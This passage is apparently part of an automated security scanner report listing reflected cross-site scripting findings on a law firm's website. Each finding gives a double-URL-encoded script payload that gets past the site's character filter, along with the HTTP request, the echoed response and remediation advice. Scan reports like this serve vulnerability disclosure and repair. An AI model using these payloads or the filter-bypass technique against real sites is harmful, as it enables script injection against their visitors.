Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: CFID=18263656; CFTOKEN=43582841

Response

HTTP/1.1 200 OK
Connection: close
Date: Wed, 19 Jan 2011 15:12:54 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Type: text/html; charset=UTF-8


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html>
<head>

   
<link rel="alternate" type="application/rss+xm
...[SNIP]...
<input type="hidden" name="404;http://www.wileyrein.com:80/css/uib6749"><script>alert(1)</script>54913b0be8b/ui.datepicker.css" value="">
...[SNIP]...

2.79. http://www.wileyrein.com/css/ui/ui.datepicker.css [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.wileyrein.com
Path:   /css/ui/ui.datepicker.css

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 45672%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e4f4fe8f9220 was submitted in the REST URL parameter 3. This input was echoed as 45672"><script>alert(1)</script>4f4fe8f9220 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 3 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /css/ui/ui.datepicker.css45672%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e4f4fe8f9220 HTTP/1.1
Host: www.wileyrein.com
Proxy-Connection: keep-alive
Referer: http://www.wileyrein.com/
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: CFID=18263656; CFTOKEN=43582841

Response

HTTP/1.1 200 OK
Connection: close
Date: Wed, 19 Jan 2011 15:12:55 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Type: text/html; charset=UTF-8


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html>
<head>

   
<link rel="alternate" type="application/rss+xm
...[SNIP]...
<input type="hidden" name="404;http://www.wileyrein.com:80/css/ui/ui.datepicker.css45672"><script>alert(1)</script>4f4fe8f9220" value="">
...[SNIP]...

2.80. http://www.wileyrein.com/css/ui/ui.dialog.css [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.wileyrein.com
Path:   /css/ui/ui.dialog.css

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 36a08%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253ecbd401dfa0f was submitted in the REST URL parameter 1. This input was echoed as 36a08"><script>alert(1)</script>cbd401dfa0f in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 1 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /css36a08%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253ecbd401dfa0f/ui/ui.dialog.css HTTP/1.1
Host: www.wileyrein.com
Proxy-Connection: keep-alive
Referer: http://www.wileyrein.com/
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: CFID=18263656; CFTOKEN=43582841

Response

HTTP/1.1 200 OK
Connection: close
Date: Wed, 19 Jan 2011 15:12:15 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Type: text/html; charset=UTF-8


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html>
<head>

   
<link rel="alternate" type="application/rss+xm
...[SNIP]...
<input type="hidden" name="404;http://www.wileyrein.com:80/css36a08"><script>alert(1)</script>cbd401dfa0f/ui/ui.dialog.css" value="">
...[SNIP]...

2.81. http://www.wileyrein.com/css/ui/ui.dialog.css [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.wileyrein.com
Path:   /css/ui/ui.dialog.css

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 8c042%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253ee88d9eeae49 was submitted in the REST URL parameter 2. This input was echoed as 8c042"><script>alert(1)</script>e88d9eeae49 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 2 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /css/ui8c042%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253ee88d9eeae49/ui.dialog.css HTTP/1.1
Host: www.wileyrein.com
Proxy-Connection: keep-alive
Referer: http://www.wileyrein.com/
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: CFID=18263656; CFTOKEN=43582841

Response

HTTP/1.1 200 OK
Connection: close
Date: Wed, 19 Jan 2011 15:12:16 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Type: text/html; charset=UTF-8


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html>
<head>

   
<link rel="alternate" type="application/rss+xm
...[SNIP]...
<input type="hidden" name="404;http://www.wileyrein.com:80/css/ui8c042"><script>alert(1)</script>e88d9eeae49/ui.dialog.css" value="">
...[SNIP]...

2.82. http://www.wileyrein.com/css/ui/ui.dialog.css [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.wileyrein.com
Path:   /css/ui/ui.dialog.css

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload bf81b%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253eed17f52d89 was submitted in the REST URL parameter 3. This input was echoed as bf81b"><script>alert(1)</script>ed17f52d89 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 3 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /css/ui/ui.dialog.cssbf81b%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253eed17f52d89 HTTP/1.1
Host: www.wileyrein.com
Proxy-Connection: keep-alive
Referer: http://www.wileyrein.com/
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: CFID=18263656; CFTOKEN=43582841

Response

HTTP/1.1 200 OK
Connection: close
Date: Wed, 19 Jan 2011 15:12:19 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Type: text/html; charset=UTF-8


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html>
<head>

   
<link rel="alternate" type="application/rss+xm
...[SNIP]...
<input type="hidden" name="404;http://www.wileyrein.com:80/css/ui/ui.dialog.cssbf81b"><script>alert(1)</script>ed17f52d89" value="">
...[SNIP]...

2.83. http://www.wileyrein.com/css/ui/ui.progressbar.css [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.wileyrein.com
Path:   /css/ui/ui.progressbar.css

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 5cb17%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253ee53ecb908c0 was submitted in the REST URL parameter 1. This input was echoed as 5cb17"><script>alert(1)</script>e53ecb908c0 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 1 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /css5cb17%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253ee53ecb908c0/ui/ui.progressbar.css HTTP/1.1
Host: www.wileyrein.com
Proxy-Connection: keep-alive
Referer: http://www.wileyrein.com/
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: CFID=18263656; CFTOKEN=43582841

Response

HTTP/1.1 200 OK
Connection: close
Date: Wed, 19 Jan 2011 15:12:50 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Type: text/html; charset=UTF-8


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html>
<head>

   
<link rel="alternate" type="application/rss+xm
...[SNIP]...
<input type="hidden" name="404;http://www.wileyrein.com:80/css5cb17"><script>alert(1)</script>e53ecb908c0/ui/ui.progressbar.css" value="">
...[SNIP]...

2.84. http://www.wileyrein.com/css/ui/ui.progressbar.css [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.wileyrein.com
Path:   /css/ui/ui.progressbar.css

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 612ba%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e8b00486b426 was submitted in the REST URL parameter 2. This input was echoed as 612ba"><script>alert(1)</script>8b00486b426 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 2 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /css/ui612ba%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e8b00486b426/ui.progressbar.css HTTP/1.1
Host: www.wileyrein.com
Proxy-Connection: keep-alive
Referer: http://www.wileyrein.com/
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: CFID=18263656; CFTOKEN=43582841

Response

HTTP/1.1 200 OK
Connection: close
Date: Wed, 19 Jan 2011 15:12:51 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Type: text/html; charset=UTF-8


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html>
<head>

   
<link rel="alternate" type="application/rss+xm
...[SNIP]...
<input type="hidden" name="404;http://www.wileyrein.com:80/css/ui612ba"><script>alert(1)</script>8b00486b426/ui.progressbar.css" value="">
...[SNIP]...

2.85. http://www.wileyrein.com/css/ui/ui.progressbar.css [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.wileyrein.com
Path:   /css/ui/ui.progressbar.css

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 13c9c%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e4a99b88c02e was submitted in the REST URL parameter 3. This input was echoed as 13c9c"><script>alert(1)</script>4a99b88c02e in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 3 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /css/ui/ui.progressbar.css13c9c%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e4a99b88c02e HTTP/1.1
Host: www.wileyrein.com
Proxy-Connection: keep-alive
Referer: http://www.wileyrein.com/
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: CFID=18263656; CFTOKEN=43582841

Response

HTTP/1.1 200 OK
Connection: close
Date: Wed, 19 Jan 2011 15:12:52 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Type: text/html; charset=UTF-8


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html>
<head>

   
<link rel="alternate" type="application/rss+xm
...[SNIP]...
<input type="hidden" name="404;http://www.wileyrein.com:80/css/ui/ui.progressbar.css13c9c"><script>alert(1)</script>4a99b88c02e" value="">
...[SNIP]...

2.86. http://www.wileyrein.com/css/ui/ui.resizable.css [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.wileyrein.com
Path:   /css/ui/ui.resizable.css

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 14fad%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e9c0b0ee56be was submitted in the REST URL parameter 1. This input was echoed as 14fad"><script>alert(1)</script>9c0b0ee56be in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 1 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /css14fad%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e9c0b0ee56be/ui/ui.resizable.css HTTP/1.1
Host: www.wileyrein.com
Proxy-Connection: keep-alive
Referer: http://www.wileyrein.com/
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: CFID=18263656; CFTOKEN=43582841

Response

HTTP/1.1 200 OK
Connection: close
Date: Wed, 19 Jan 2011 15:12:15 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Type: text/html; charset=UTF-8


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html>
<head>

   
<link rel="alternate" type="application/rss+xm
...[SNIP]...
<input type="hidden" name="404;http://www.wileyrein.com:80/css14fad"><script>alert(1)</script>9c0b0ee56be/ui/ui.resizable.css" value="">
...[SNIP]...

2.87. http://www.wileyrein.com/css/ui/ui.resizable.css [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.wileyrein.com
Path:   /css/ui/ui.resizable.css

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 3fcda%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e8c138520eda was submitted in the REST URL parameter 2. This input was echoed as 3fcda"><script>alert(1)</script>8c138520eda in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 2 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /css/ui3fcda%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e8c138520eda/ui.resizable.css HTTP/1.1
Host: www.wileyrein.com
Proxy-Connection: keep-alive
Referer: http://www.wileyrein.com/
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: CFID=18263656; CFTOKEN=43582841

Response

HTTP/1.1 200 OK
Connection: close
Date: Wed, 19 Jan 2011 15:12:16 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Type: text/html; charset=UTF-8


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html>
<head>

   
<link rel="alternate" type="application/rss+xm
...[SNIP]...
<input type="hidden" name="404;http://www.wileyrein.com:80/css/ui3fcda"><script>alert(1)</script>8c138520eda/ui.resizable.css" value="">
...[SNIP]...

2.88. http://www.wileyrein.com/css/ui/ui.resizable.css [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.wileyrein.com
Path:   /css/ui/ui.resizable.css

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f779c%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e382088a8c20 was submitted in the REST URL parameter 3. This input was echoed as f779c"><script>alert(1)</script>382088a8c20 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 3 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /css/ui/ui.resizable.cssf779c%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e382088a8c20 HTTP/1.1
Host: www.wileyrein.com
Proxy-Connection: keep-alive
Referer: http://www.wileyrein.com/
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: CFID=18263656; CFTOKEN=43582841

Response

HTTP/1.1 200 OK
Connection: close
Date: Wed, 19 Jan 2011 15:12:17 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Type: text/html; charset=UTF-8


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html>
<head>

   
<link rel="alternate" type="application/rss+xm
...[SNIP]...
<input type="hidden" name="404;http://www.wileyrein.com:80/css/ui/ui.resizable.cssf779c"><script>alert(1)</script>382088a8c20" value="">
...[SNIP]...

2.89. http://www.wileyrein.com/css/ui/ui.slider.css [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.wileyrein.com
Path:   /css/ui/ui.slider.css

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c2d5f%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e87253ed8d10 was submitted in the REST URL parameter 1. This input was echoed as c2d5f"><script>alert(1)</script>87253ed8d10 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 1 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /cssc2d5f%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e87253ed8d10/ui/ui.slider.css HTTP/1.1
Host: www.wileyrein.com
Proxy-Connection: keep-alive
Referer: http://www.wileyrein.com/
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: CFID=18263656; CFTOKEN=43582841

Response

HTTP/1.1 200 OK
Connection: close
Date: Wed, 19 Jan 2011 15:12:42 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Type: text/html; charset=UTF-8


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html>
<head>

   
<link rel="alternate" type="application/rss+xm
...[SNIP]...
<input type="hidden" name="404;http://www.wileyrein.com:80/cssc2d5f"><script>alert(1)</script>87253ed8d10/ui/ui.slider.css" value="">
...[SNIP]...

2.90. http://www.wileyrein.com/css/ui/ui.slider.css [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.wileyrein.com
Path:   /css/ui/ui.slider.css

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 7d474%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e1e1c925c625 was submitted in the REST URL parameter 2. This input was echoed as 7d474"><script>alert(1)</script>1e1c925c625 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 2 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /css/ui7d474%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e1e1c925c625/ui.slider.css HTTP/1.1
Host: www.wileyrein.com
Proxy-Connection: keep-alive
Referer: http://www.wileyrein.com/
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: CFID=18263656; CFTOKEN=43582841

Response

HTTP/1.1 200 OK
Connection: close
Date: Wed, 19 Jan 2011 15:12:43 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Type: text/html; charset=UTF-8


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html>
<head>

   
<link rel="alternate" type="application/rss+xm
...[SNIP]...
<input type="hidden" name="404;http://www.wileyrein.com:80/css/ui7d474"><script>alert(1)</script>1e1c925c625/ui.slider.css" value="">
...[SNIP]...

2.91. http://www.wileyrein.com/css/ui/ui.slider.css [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.wileyrein.com
Path:   /css/ui/ui.slider.css

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload eb3ab%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253ede52d4ea844 was submitted in the REST URL parameter 3. This input was echoed as eb3ab"><script>alert(1)</script>de52d4ea844 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 3 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /css/ui/ui.slider.csseb3ab%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253ede52d4ea844 HTTP/1.1
Host: www.wileyrein.com
Proxy-Connection: keep-alive
Referer: http://www.wileyrein.com/
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: CFID=18263656; CFTOKEN=43582841

Response

HTTP/1.1 200 OK
Connection: close
Date: Wed, 19 Jan 2011 15:12:44 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Type: text/html; charset=UTF-8


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html>
<head>

   
<link rel="alternate" type="application/rss+xm
...[SNIP]...
<input type="hidden" name="404;http://www.wileyrein.com:80/css/ui/ui.slider.csseb3ab"><script>alert(1)</script>de52d4ea844" value="">
...[SNIP]...

2.92. http://www.wileyrein.com/css/ui/ui.tabs.css [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.wileyrein.com
Path:   /css/ui/ui.tabs.css

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e5847%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e63b9f9dcf48 was submitted in the REST URL parameter 1. This input was echoed as e5847"><script>alert(1)</script>63b9f9dcf48 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 1 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /csse5847%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e63b9f9dcf48/ui/ui.tabs.css HTTP/1.1
Host: www.wileyrein.com
Proxy-Connection: keep-alive
Referer: http://www.wileyrein.com/
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: CFID=18263656; CFTOKEN=43582841

Response

HTTP/1.1 200 OK
Connection: close
Date: Wed, 19 Jan 2011 15:12:44 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Type: text/html; charset=UTF-8


